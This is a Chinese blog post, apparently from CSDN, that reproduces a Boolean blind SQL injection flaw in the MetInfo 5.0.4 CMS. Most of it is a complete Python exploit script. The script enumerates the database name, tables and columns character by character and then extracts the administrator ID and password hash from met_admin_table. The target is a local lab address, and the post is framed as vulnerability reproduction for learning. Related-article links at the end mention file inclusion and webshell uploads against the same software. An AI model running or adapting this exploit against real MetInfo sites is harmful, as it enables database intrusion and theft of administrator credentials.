Metinfo_5.0.4 布尔盲注漏洞复现以及exp编写

最新推荐文章于 2024-07-28 15:46:11 发布
最新推荐文章于 2024-07-28 15:46:11 发布
阅读量185 收藏
点赞数
分类专栏: 漏洞复现 文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oyqsb/article/details/131867045
版权

布尔盲注

        布尔盲注一般适用于页面没有回显字段,但页面回显有True 或者 false两种情况,利用and,or等关键字来构造SQL语句,再利用页面返回true或false来判断是否执行成功,从而达到注入的目的来获取信息。

漏洞复现

        漏洞注入点在‘联系我们’页面的url上

         利用and 1=1 和 1=2 判断出布尔盲注

         利用length函数判断出数据库长度为11

exp编写 

# metinfo_504_sqli.py

import requests
import string
url = "http://192.168.66.29/metinfo_504/about/show.php?lang=cn&id=22"
headers = {
    "User-Agent"    :     "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
}
flag = "13300000000"    #利用页面上的电话号码来判断页面返回为True
str =string.printable.strip()

# 爆数据库长度
print("--------------------------------------Attacking.....")
for i in range(20) :
    payload = f" and length(database())={i} --+"
    url_all = url + payload
    # print(url_all)
    res = requests.get(url = url_all , headers=headers)
    if flag in res.text :
        break
print(f"The database length is: {i}")

# 爆库
print("--------------------------------------Attacking.....")
dbs1 = ""
for i in range(1,12) :
    for c in str :
        payloads = f" and ascii(substr((select database()),{i},1))={ord(c)} --+"
        url_all = url + payloads
        # print(url_all)
        
        res = requests.get(url=url_all,headers=headers)
        if flag in res.text :
            dbs1 += c
            break
print(f"The db_name is: {dbs1}")

# 爆表长度
print("--------------------------------------Attacking.....")
for i in range(1,500) :
    payload = f""" and length((select group_concat(table_name) from information_schema.tables 
    where table_schema=database()))={i} --+"""
    url_all = url + payload
    # print(url_all)
    res = requests.get(url = url_all , headers=headers)
    if flag in res.text :
        break
print(f"The table length is: {i}")
   
# 爆表
print("--------------------------------------Attacking.....")
dbs2 = ""
for i in range(1,333) :
    for c in str :
        payloads = f""" and ascii(substr((select group_concat(table_name) from information_schema.tables 
        where table_schema=database()),{i},1))={ord(c)} --+"""
        url_all = url + payloads
        # print(url_all)
        res = requests.get(url=url_all,headers=headers)
        if flag in res.text :
            dbs2 += c
            break
print(f"The tab_name is: {dbs2}")

# 爆列长度
print("--------------------------------------Attacking.....")     
for i in range(1,500) :
    payload = f""" and length((select group_concat(column_name) from information_schema.columns 
    where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65))={i} --+"""
    url_all = url + payload
    # print(url_all)
    res = requests.get(url = url_all , headers=headers)
    if flag in res.text :
        break
print(f"The column length is: {i}")

# 爆列
print("--------------------------------------Attacking.....")
dbs3 = ""
for i in range(1,365) :
    for c in str :
        payloads = f""" and ascii(substr((select group_concat(column_name) from information_schema.columns 
        where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65),{i},1))={ord(c)} --+"""
        url_all = url + payloads
        # print(url_all)
        res = requests.get(url=url_all,headers=headers)
        if flag in res.text :
            dbs3 += c
            break
print(f"The column_name is: {dbs3}")

# 爆数据长度
print("--------------------------------------Attacking.....")
for i in range(1,500) :
    payload = f" and length((select concat(admin_id,0x3a,admin_pass) from met_admin_table))={i} --+"
    url_all = url + payload
    # print(url_all)
    res = requests.get(url = url_all , headers=headers)
    if flag in res.text :
        
        break
print(f"The userpass length is: {i}")

# 爆数据
dbs4 = ""
print("--------------------------------------Attacking.....")
for i in range(1,39) :
    for c in str :
        payloads = f" and ascii(substr((select concat(admin_id,0x3a,admin_pass) from met_admin_table),{i},1))={ord(c)} --+"
        url_all = url + payloads
        res = requests.get(url= url_all,headers=headers)
        if flag in res.text:
            dbs4 += c
            break
print(f"The userpass is: {dbs4}")

        exp效果如下

睡了有点困
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metinfo_5.0.4 任意文件本地包含漏洞复现metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 509
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
MetInfo_V7.2.0短信接口插件demo.zip
11-02
MetInfo_V7.2.0短信接口插件:企业网站高效通信的得力助手》 MetInfo是一款广泛应用于企业建站的开源CMS系统,其最新版本V7.2.0引入了一项重要的功能增强——短信接口插件。这个插件的出现,使得企业网站在与用户...
metinfo_5.0.4_filein-Include漏洞复现
m0_64583632的博客
02-06 360
metinfo_5.0.4_filein-Include漏洞复现
漏洞挖掘姿势之metinfo 建站系统-任意文件读取漏洞
Grace_for_it的博客
05-10 501
metinfo 建站系统 任意文件读取漏洞 漏洞挖掘
metinfo_5.0.4 布尔盲注 exp
weixin_51559599的博客
11-08 262
提取码:dx2o。
【文件包含】metinfo 5.0.4 文件包含漏洞复现
wj33333的博客
11-15 360
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 5.0.4版本中的/metinfo_5.0.4/about/index.php?fmodule文件存在任意文件包含漏洞。攻击者可利用漏洞读取网站上的敏感文件。
metinfo_5.0.4_file-upload
weixin_43886198的博客
12-21 1245
metinfo_5.0.4_file-upload 漏洞描述 MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞漏洞危害等级 高危 影响版本 5.0.4 漏洞复现 基础环境 组件 版本 OS Windows 2008 R2 x64 Web Server phpStudy 2016(特别版) Source Code MetInfoV5.0.4 漏洞演示 本地构造HTML 表单,进行文件上传 变量覆盖,SQL注入(# %23),双写绕过。
metinfov5.0.4漏洞复现
千寻的博客
02-29 2487
文章目录第一章 介绍第二章环境搭建第三章存在漏洞第一节SQL注入第一步 注入点第二步 盲注第三步 漏洞原理第二节文件包含第一节漏洞页面第二节漏洞利用第三节漏洞分析第四节文件上传第一步 漏洞页面第二步 漏洞利用第三步 漏洞分析免责声明 第一章 介绍 MetInfo企业网站管理系统采用php+ Mysql架构全站内置了SEO搜索引优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块...
漏洞复现Metinfo5.0.4任意文件包含漏洞复现
过期的秋刀鱼
11-04 601
文件夹中有个新建文件shell.php,即可用蚁剑连接。下放入一张没有木马的图片,使用另一种方式制作图片木马。,当我们直接包含图片的时候,这段代码就会被执行。复制得到的base64编码格式的php代码。该段代码的含义是,在当前目录下创建一个名为。把POST请求体中的变量放到url中提交。,然后在下面写入php代码,点击send。上传图片木马,通过文件包含的方式去访问。bp拦截得到php源码的数据包。使用文件包含的方式去访问图片。该环境的文件上传点在。但是上传文件会失败,拿到webshell。
metinfo_5.0.4 EXP Python脚本编写
qq_45953122的博客
09-23 214
拿 sqlmap 跑,发现只检测出了延时注入,而没有检测出存在布尔盲注,而延时注入的成本要比布尔盲注的成本要高许多,所以我们就可以自己写一个布尔盲注脚本。获取到表名之后,怎么拿到管理员账密,因为metinfo是一个出名的网站管理系统,我们可以通过百度搜一下他的数据库结构。在每次循环中,代码构造一个 payload 用于获取数据库名称和所有表名的字符。代码进入一个嵌套循环,外层循环遍历数据库名称的每个字符位置,内层循环遍历在 ASCII 可打印字符集
metinfo 5.0.4 文件上传漏洞复现
agrilly的博客
07-24 464
metinfo 、文件上传、漏洞、一句话木马
metinfo_手机生成静态页面.zip
04-29
本文将详细介绍如何利用Metinfo后台生成手机端静态页面以及其工作原理。 首先,我们需要理解“静态页面”的概念。静态页面是预先生成并存储在服务器上的HTML文件,用户访问时直接读取,无需经过服务器端的动态解析...
MetInfo_php源码_
09-30
MetInfo PHP website system is a collection of "computer mobile site WeChat public" triad of company system
MetInfo短信插件_MetInfo短信接口开发_MetInfo短信发送设置
01-07
在这个主题中,我们主要关注的是MetInfo的短信插件、短信接口开发以及短信发送设置的相关知识点。 一、MetInfo短信插件 MetInfo短信插件是MetInfo系统中的一个重要组件,它的主要作用是实现网站与用户之间的信息...
metinfo 后台sql注入1
08-03
MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 1050
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1145
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
Chapter 18 Python异常
最新发布
2302_80253507的博客
07-28 1279
Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
MetInfo数据与页面参数深度解析
"MetInfo数据及页面参数详解" MetInfo是一款功能强大的企业建站系统,它提供了丰富的数据和页面参数,使得用户可以自定义网站的外观和行为。本教程主要聚焦于MetInfo系统中用于控制网站展示的关键参数,帮助用户更...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值